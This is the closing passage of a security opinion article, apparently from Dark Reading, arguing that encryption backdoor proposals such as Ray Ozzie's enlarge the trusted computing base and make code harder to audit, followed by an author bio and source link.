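One stray line in reviewed code, and the security property silently disappears; that is the argument for keeping the TCB small enough to audit.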

Worse, the addition of secure enclaves, secure boot, and related features make it hard to test this code. The only people who’ll be able to do so are first, Apple; second, well-resourced nations; and third, vendors that sell jailbreaks. So, bugs are less likely to be found. Those that exist will live longer because no one who can audit the code (except Apple) will ever collaborate to get the bugs fixed. The code will be complex and require deep skill to analyze.

Bottom line: This proposal, like all backdoor proposals, involves a dramatically larger and more complex trusted computing base. Bugs in the TCB are security bugs, and it’s already hard enough to get the code right. And this goes back to the unavoidable risk of proposals like these: doing the threat modeling and security analysis is very, very hard, and there’s only a small set of people who can do it. Each element we add to the existing workload (analyzing the Wi-Fi stack, the Bluetooth stack, the Web stack, the sandbox, the app store) spreads that analysis work over a larger attack surface, and the effect is not linear. Each component to review involves ramp-up time, familiarization, and analysis, so the more components we add, the worse the security of each will be.

This analysis, fundamentally, is independent of the crypto. There is no magic crypto implementation that works without code. Securing code is hard. Ignoring that is dangerous. Can we please stop?

Adam is an entrepreneur, technologist, author and game designer. He’s a member of the BlackHat Review Board, and helped found the CVE and many other things. He’s currently building his fifth startup, focused on improving security effectiveness, and mentors startups as a … View Full Bio

Article source: https://www.darkreading.com/endpoint/risky-business-deconstructing-ray-ozzies-encryption-backdoor/a/d-id/1331743?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple